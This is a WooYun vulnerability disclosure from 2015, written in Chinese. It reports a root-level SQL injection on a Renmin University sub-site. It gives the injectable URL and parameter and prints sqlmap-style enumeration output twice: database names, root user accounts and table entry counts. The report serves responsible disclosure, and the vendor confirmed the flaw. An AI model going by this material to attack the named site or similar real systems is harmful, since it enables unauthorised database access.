漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0100879
漏洞标题:中国人民大学理工学科建设处分站root权限注入漏洞
相关厂商:中国人民大学
漏洞作者: ago
提交时间:2015-03-13 14:31
修复时间:2015-04-27 14:32
公开时间:2015-04-27 14:32
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-13: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-23: 细节向核心白帽子及相关领域专家公开
2015-04-02: 细节向普通白帽子公开
2015-04-12: 细节向实习白帽子公开
2015-04-27: 细节向公众公开
简要描述:
详细说明:
漏洞点
http://se-office.ruc.edu.cn/cn/index.php?do=list&channelid=4094
[*] demo_ysite_client
[*] information_schema
[*] mysql
[*] test
[*] yizincms_new
[*] ysite_host
database management system users [83]:
[*] ''@'ct10000'
[*] ''@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'ct10000'
[*] 'root'@'localhost'
Database: yizincms_new
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| yizincms_siteflow | 116355 |
| yizincms_mu_domain_audit | 949 |
| yizincms_en_settings | 574 |
| yizincms_en_member | 469 |
| yizincms_case | 383 |
| yizincms_annex | 380 |
| yizincms_case_fujian_data | 315 |
| yizincms_en_interface | 209 |
| yizincms_en_annex | 91 |
| yizincms_slides | 85 |
| yizincms_comment | 80 |
| yizincms_links | 79 |
| yizincms_privacy | 76 |
| yizincms_model_source | 75 |
| yizincms_en_privacy | 57 |
| yizincms_ag_agent_all | 56 |
| yizincms_wap_settings | 52 |
| yizincms_member_details | 50 |
| yizincms_en_slides | 45 |
| yizincms_wap_en_settings | 39 |
| yizincms_mu_site_level | 33 |
| yizincms_en_links | 31 |
| yizincms_en_member_details | 31 |
| yizincms_ads | 30 |
| yizincms_en_case_fujian_data | 27 |
| yizincms_msg | 27 |
| yizincms_catalog | 26 |
| yizincms_wap_article | 25 |
| yizincms_settings | 24 |
| yizincms_en_comment | 23 |
| yizincms_site_tags | 23 |
| yizincms_case_annex_data | 22 |
| yizincms_en_ads | 22 |
| yizincms_en_case_annex_data | 22 |
| yizincms_en_msg | 22 |
| yizincms_warning_signs | 20 |
| yizincms_en_grade | 18 |
| yizincms_grade | 18 |
| yizincms_comment_reply | 16 |
| yizincms_wap_en_article | 16 |
| yizincms_en_warning_signs | 15 |
| yizincms_ag_msg | 13 |
| yizincms_wap_catalog | 13 |
| yizincms_en_plus | 10 |
| yizincms_plus | 10 |
| yizincms_model_page | 9 |
| yizincms_settplargument | 9 |
| yizincms_wap_links_group | 9 |
| yizincms_slides_group | 8 |
| yizincms_en_case_annex | 7 |
| yizincms_en_settplargument | 6 |
| yizincms_wap_en_links_group | 6 |
| yizincms_catalog_admin | 5 |
| yizincms_en_catalog_admin | 5 |
| yizincms_wap_en_catalog | 5 |
| yizincms_member | 3 |
| yizincms_groups | 2 |
| yizincms_site_material_articleico | 2 |
| yizincms_wap_en_filter | 2 |
| yizincms_wap_filter | 2 |
| yizincms_wap_links | 2 |
| yizincms_en_member_other | 1 |
| yizincms_host_list | 1 |
| yizincms_host_site_list | 1 |
| yizincms_interface | 1 |
| yizincms_member_other | 1 |
| yizincms_mu_config | 1 |
| yizincms_site | 1 |
| yizincms_wap_ads | 1 |
| yizincms_wap_en_ads | 1 |
| yizincms_wap_en_links | 1 |
+-----------------------------------+---------+
漏洞证明:
Database: yizincms_new
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| yizincms_siteflow | 116355 |
| yizincms_mu_domain_audit | 949 |
| yizincms_en_settings | 574 |
| yizincms_en_member | 469 |
| yizincms_case | 383 |
| yizincms_annex | 380 |
| yizincms_case_fujian_data | 315 |
| yizincms_en_interface | 209 |
| yizincms_en_annex | 91 |
| yizincms_slides | 85 |
| yizincms_comment | 80 |
| yizincms_links | 79 |
| yizincms_privacy | 76 |
| yizincms_model_source | 75 |
| yizincms_en_privacy | 57 |
| yizincms_ag_agent_all | 56 |
| yizincms_wap_settings | 52 |
| yizincms_member_details | 50 |
| yizincms_en_slides | 45 |
| yizincms_wap_en_settings | 39 |
| yizincms_mu_site_level | 33 |
| yizincms_en_links | 31 |
| yizincms_en_member_details | 31 |
| yizincms_ads | 30 |
| yizincms_en_case_fujian_data | 27 |
| yizincms_msg | 27 |
| yizincms_catalog | 26 |
| yizincms_wap_article | 25 |
| yizincms_settings | 24 |
| yizincms_en_comment | 23 |
| yizincms_site_tags | 23 |
| yizincms_case_annex_data | 22 |
| yizincms_en_ads | 22 |
| yizincms_en_case_annex_data | 22 |
| yizincms_en_msg | 22 |
| yizincms_warning_signs | 20 |
| yizincms_en_grade | 18 |
| yizincms_grade | 18 |
| yizincms_comment_reply | 16 |
| yizincms_wap_en_article | 16 |
| yizincms_en_warning_signs | 15 |
| yizincms_ag_msg | 13 |
| yizincms_wap_catalog | 13 |
| yizincms_en_plus | 10 |
| yizincms_plus | 10 |
| yizincms_model_page | 9 |
| yizincms_settplargument | 9 |
| yizincms_wap_links_group | 9 |
| yizincms_slides_group | 8 |
| yizincms_en_case_annex | 7 |
| yizincms_en_settplargument | 6 |
| yizincms_wap_en_links_group | 6 |
| yizincms_catalog_admin | 5 |
| yizincms_en_catalog_admin | 5 |
| yizincms_wap_en_catalog | 5 |
| yizincms_member | 3 |
| yizincms_groups | 2 |
| yizincms_site_material_articleico | 2 |
| yizincms_wap_en_filter | 2 |
| yizincms_wap_filter | 2 |
| yizincms_wap_links | 2 |
| yizincms_en_member_other | 1 |
| yizincms_host_list | 1 |
| yizincms_host_site_list | 1 |
| yizincms_interface | 1 |
| yizincms_member_other | 1 |
| yizincms_mu_config | 1 |
| yizincms_site | 1 |
| yizincms_wap_ads | 1 |
| yizincms_wap_en_ads | 1 |
| yizincms_wap_en_links | 1 |
+-----------------------------------+---------+
修复方案:
过滤
版权声明:转载请注明来源 ago@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-03-13 16:38
厂商回复:
非常感谢!已通知部门处理!
最新状态:
暂无